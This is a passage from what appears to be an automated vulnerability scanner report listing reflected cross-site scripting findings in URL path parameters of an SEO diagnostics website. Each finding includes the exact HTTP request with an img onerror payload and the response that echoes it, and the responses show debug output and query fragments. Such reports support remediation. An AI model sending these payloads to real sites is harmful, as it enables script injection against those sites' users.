The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d6d2"><img%20src%3da%20onerror%3dalert(1)>cca06ff5eb1 was submitted in the REST URL parameter 5. This input was echoed as 9d6d2"><img src=a onerror=alert(1)>cca06ff5eb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/17989d6d2"><img%20src%3da%20onerror%3dalert(1)>cca06ff5eb1/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:07 GMT
Server: Apache
Set-Cookie: CAKEPHP=qoh4qv7s312s05tb7qp9vth8p6; expires=Mon, 09-May-2011 02:52:08 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/17989d6d2"><img src=a onerror=alert(1)>cca06ff5eb1/N" title="SEO Quotient for ">
...[SNIP]...
7.92. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 27c77<img%20src%3da%20onerror%3dalert(1)>e320e195de4 was submitted in the REST URL parameter 6. This input was echoed as 27c77<img src=a onerror=alert(1)>e320e195de4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1798/N27c77<img%20src%3da%20onerror%3dalert(1)>e320e195de4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:04 GMT
Server: Apache
Set-Cookie: CAKEPHP=kkbkcldi43kvgr7kjf9rb3d027; expires=Mon, 09-May-2011 02:53:05 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=kkbkcldi43kvgr7kjf9rb3d027; expires=Mon, 09-May-2011 02:53:05 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>e320e195de4" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/1798/N27c77<img src=a onerror=alert(1)>e320e195de4ddd</a>
...[SNIP]...
7.93. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10e4c"><img%20src%3da%20onerror%3dalert(1)>fdf07480bd7 was submitted in the REST URL parameter 6. This input was echoed as 10e4c"><img src=a onerror=alert(1)>fdf07480bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1798/N10e4c"><img%20src%3da%20onerror%3dalert(1)>fdf07480bd7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:56 GMT
Server: Apache
Set-Cookie: CAKEPHP=7sjmdmq9ogetig71s5iclg8c02; expires=Mon, 09-May-2011 02:52:57 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=7sjmdmq9ogetig71s5iclg8c02; expires=Mon, 09-May-2011 02:52:57 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/1798/N10e4c"><img src=a onerror=alert(1)>fdf07480bd7" title="SEO Quotient for ">
...[SNIP]...
7.94. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a543b'%3b2545d1f9485 was submitted in the REST URL parameter 6. This input was echoed as a543b';2545d1f9485 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/1798/Na543b'%3b2545d1f9485 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:58 GMT
Server: Apache
Set-Cookie: CAKEPHP=mmj8kuukdd1rlb7pp2ne3jf3v3; expires=Mon, 09-May-2011 02:52:58 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1798/Na543b';2545d1f9485';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.95. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7e3a"><img%20src%3da%20onerror%3dalert(1)>74f4e28a186 was submitted in the REST URL parameter 5. This input was echoed as d7e3a"><img src=a onerror=alert(1)>74f4e28a186 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2270d7e3a"><img%20src%3da%20onerror%3dalert(1)>74f4e28a186/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:54 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2270d7e3a"><img src=a onerror=alert(1)>74f4e28a186/N" title="SEO Quotient for ">
...[SNIP]...
7.96. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9927b'%3bea8e15f9683 was submitted in the REST URL parameter 5. This input was echoed as 9927b';ea8e15f9683 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/22709927b'%3bea8e15f9683/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:55 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/22709927b';ea8e15f9683/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.97. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e15d9<img%20src%3da%20onerror%3dalert(1)>1f903fbffe7 was submitted in the REST URL parameter 5. This input was echoed as e15d9<img src=a onerror=alert(1)>1f903fbffe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2270e15d9<img%20src%3da%20onerror%3dalert(1)>1f903fbffe7/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55871


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 2270e15d9<img src=a onerror=alert(1)>1f903fbffe7 and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...
7.98. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3caeb<img%20src%3da%20onerror%3dalert(1)>66d932dc0c2 was submitted in the REST URL parameter 6. This input was echoed as 3caeb<img src=a onerror=alert(1)>66d932dc0c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2270/N3caeb<img%20src%3da%20onerror%3dalert(1)>66d932dc0c2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:25 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:26 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>66d932dc0c2" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2270/N3caeb<img src=a onerror=alert(1)>66d932dc0c2ddd</a>
...[SNIP]...
7.99. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 884bf"><img%20src%3da%20onerror%3dalert(1)>9c07f8e8c0e was submitted in the REST URL parameter 6. This input was echoed as 884bf"><img src=a onerror=alert(1)>9c07f8e8c0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2270/N884bf"><img%20src%3da%20onerror%3dalert(1)>9c07f8e8c0e HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:20 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:21 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2270/N884bf"><img src=a onerror=alert(1)>9c07f8e8c0e" title="SEO Quotient for ">
...[SNIP]...
7.100. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65697'%3ba38fc3b641e was submitted in the REST URL parameter 6. This input was echoed as 65697';a38fc3b641e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/2270/N65697'%3ba38fc3b641e HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:21 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/2270/N65697';a38fc3b641e';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.101. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb0a7"><img%20src%3da%20onerror%3dalert(1)>7c5aa4a2ff9 was submitted in the REST URL parameter 5. This input was echoed as fb0a7"><img src=a onerror=alert(1)>7c5aa4a2ff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2271fb0a7"><img%20src%3da%20onerror%3dalert(1)>7c5aa4a2ff9/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:03 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2271fb0a7"><img src=a onerror=alert(1)>7c5aa4a2ff9/N" title="SEO Quotient for ">
...[SNIP]...
7.102. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1df87<img%20src%3da%20onerror%3dalert(1)>8d2c0db8f8a was submitted in the REST URL parameter 5. This input was echoed as 1df87<img src=a onerror=alert(1)>8d2c0db8f8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/22711df87<img%20src%3da%20onerror%3dalert(1)>8d2c0db8f8a/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 22711df87<img src=a onerror=alert(1)>8d2c0db8f8a and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...
7.103. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7152a'%3b46cb5a92766 was submitted in the REST URL parameter 5. This input was echoed as 7152a';46cb5a92766 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/22717152a'%3b46cb5a92766/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:04 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/22717152a';46cb5a92766/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.104. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload fa882<img%20src%3da%20onerror%3dalert(1)>364ce087de6 was submitted in the REST URL parameter 6. This input was echoed as fa882<img src=a onerror=alert(1)>364ce087de6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2271/Nfa882<img%20src%3da%20onerror%3dalert(1)>364ce087de6 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:31 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:32 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>364ce087de6" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2271/Nfa882<img src=a onerror=alert(1)>364ce087de6ddd</a>
...[SNIP]...
7.105. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a07d'%3b128b7d3a24e was submitted in the REST URL parameter 6. This input was echoed as 6a07d';128b7d3a24e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/2271/N6a07d'%3b128b7d3a24e HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/2271/N6a07d';128b7d3a24e';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.106. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e219d"><img%20src%3da%20onerror%3dalert(1)>386ed1751a4 was submitted in the REST URL parameter 6. This input was echoed as e219d"><img src=a onerror=alert(1)>386ed1751a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

